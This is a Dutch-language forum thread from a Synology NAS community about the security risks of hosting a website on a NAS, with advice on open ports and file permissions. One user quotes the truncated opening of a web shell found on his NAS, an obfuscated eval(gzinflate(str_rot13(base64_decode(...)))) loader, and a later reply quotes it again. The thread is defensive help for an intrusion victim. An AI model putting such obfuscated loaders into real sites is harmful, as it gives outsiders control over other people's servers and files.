Auteur Topic: veiligheids risico's webserver op nas  (gelezen 6094 keer)

Offline rjant2

  • Bedankjes
  • -Gegeven: 0
  • -Ontvangen: 0
  • Berichten: 2
veiligheids risico's webserver op nas
« Gepost op: 19 februari 2013, 15:12:59 »
Hallo,

Ik ben ondertussen een half jaartje in het bezit van een synology ds112+.
Ik wil de web server functie een gebruiken voor mijn site. ik vraag me alleen af wat de veiligheids risico's zijn op het moment dat ik een webserver start die van buiten de lan te bereiken is.
Als de site gehackt word kunnen mensen dan bij mijn andere bestanden op de nas ect..

Mijn vraag is dus hoe veilig is het, een website hosten op je nas?

Ik hoop dat jullie antwoord op mijn vraag kunnen geven,
alvast bedankt!

Offline Matr1x

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 270
  • -Ontvangen: 772
  • Berichten: 5.093
Re: veiligheids risico's webserver op nas
« Reactie #1 Gepost op: 19 februari 2013, 15:20:17 »
Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.
  • Mijn Synology: DS224+
  • HDD's: 2x HAT3300-4T
  • Extra's: MR2200ac / RT2600ac

Offline rjant2

  • Bedankjes
  • -Gegeven: 0
  • -Ontvangen: 0
  • Berichten: 2
Re: veiligheids risico's webserver op nas
« Reactie #2 Gepost op: 19 februari 2013, 15:29:00 »
Oke, bedankt voor de informatie!!, dan ga ik eens kijken of het mij lukt een webserver op te zetten!

Offline nikilauda

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 1
  • Berichten: 11
Re: veiligheids risico's webserver op nas
« Reactie #3 Gepost op: 11 oktober 2013, 19:56:08 »
Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.
Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Hiermee kan men (proberen) de inhoud van de NAS bekijken. Enkele maanden geleden stond er ook zoiets op. je kon er door de gehele NAS bladeren.

Ik heb heel veel gezocht om dit te kunnen voorkomen.
Iemand ideeen???

Dit was het begin van het laatste php bestand
<title>IRCPlanet Upload</title> <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1399
  • -Ontvangen: 8046
  • Berichten: 44.176
  • Fijne feestdagen.......
    • Truebase
Re: veiligheids risico's webserver op nas
« Reactie #4 Gepost op: 11 oktober 2013, 21:36:10 »
Citaat
Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Een lek in je Website zelf misschien ?

Zo te zien komt dit van een gebruiker van KPN vandaan, maar goed, eigenlijk heb je niets aan die info :S


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-8   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-8
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-8   DS220+    DSM 7.2.2-72806-2
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-2   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.2-65567                                                                 MR2200ac  SRM 1.3.1-9346-12

Offline Grofweg

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 14
  • -Ontvangen: 102
  • Berichten: 576
Re: veiligheids risico's webserver op nas
« Reactie #5 Gepost op: 11 oktober 2013, 22:01:21 »
Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.
Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Hiermee kan men (proberen) de inhoud van de NAS bekijken. Enkele maanden geleden stond er ook zoiets op. je kon er door de gehele NAS bladeren.

Ik heb heel veel gezocht om dit te kunnen voorkomen.
Iemand ideeen???

Dit was het begin van het laatste php bestand
<title>IRCPlanet Upload</title> <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci

Wat voor een website heb je draaien, WordPress of Joomla? Vaak is dit het gevolg van onjuiste rechteninstelling. Het kan geen kwaad om die zeker even na te lopen.
Wordpress info: http://codex.wordpress.org/Changing_File_Permissions
Joomla info: http://docs.joomla.org/Verifying_permissions
  • Mijn Synology: DS718+
  • HDD's: 2x WD20EFRX
- Synology DS718+/DS115 -> RPi4 (O!MPD/DietPi -> Aune X8-> Exposure 3010S2 -> PMC FB1i 
- RPi4 (O!MPD/DietPi -> Aune S6-> Beyerdynamic dt 1990 pro

Offline nikilauda

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 1
  • Berichten: 11
Re: veiligheids risico's webserver op nas
« Reactie #6 Gepost op: 12 oktober 2013, 13:28:09 »
Het is een website waar geen CMS op draait maar een in PHP geschreven  logger voor mijn zonnepanelen.

Offline Grofweg

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 14
  • -Ontvangen: 102
  • Berichten: 576
Re: veiligheids risico's webserver op nas
« Reactie #7 Gepost op: 14 oktober 2013, 17:21:20 »
Het is een website waar geen CMS op draait maar een in PHP geschreven  logger voor mijn zonnepanelen.

Controleer dan bv met Filezilla wat de rechten zij  per bestand en map.
Zet alle mappen minimaal op 755 en alle bestanden op 644.
  • Mijn Synology: DS718+
  • HDD's: 2x WD20EFRX
- Synology DS718+/DS115 -> RPi4 (O!MPD/DietPi -> Aune X8-> Exposure 3010S2 -> PMC FB1i 
- RPi4 (O!MPD/DietPi -> Aune S6-> Beyerdynamic dt 1990 pro

Offline fred54

  • Bedankjes
  • -Gegeven: 0
  • -Ontvangen: 0
  • Berichten: 42
Re: veiligheids risico's webserver op nas
« Reactie #8 Gepost op: 14 oktober 2013, 17:54:44 »
Wat bedoel je met:
Zet alle mappen minimaal op 755 en alle bestanden op 644. ?

En een website kan met html geschreven zijn, wat geldt hiervvor?
  • Mijn Synology: DS220+
Synology DS220+, DSM 7.2.1-69057 Update 1

Offline Grofweg

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 14
  • -Ontvangen: 102
  • Berichten: 576
Re: veiligheids risico's webserver op nas
« Reactie #9 Gepost op: 14 oktober 2013, 20:33:07 »
Wat bedoel je met:
Zet alle mappen minimaal op 755 en alle bestanden op 644. ?

Hier vind je daar een aardige uitleg over.

En een website kan met html geschreven zijn, wat geldt hiervvor?

Dit is een bestand, dus daar geldt het zelfde voor als voor php-bestanden.
  • Mijn Synology: DS718+
  • HDD's: 2x WD20EFRX
- Synology DS718+/DS115 -> RPi4 (O!MPD/DietPi -> Aune X8-> Exposure 3010S2 -> PMC FB1i 
- RPi4 (O!MPD/DietPi -> Aune S6-> Beyerdynamic dt 1990 pro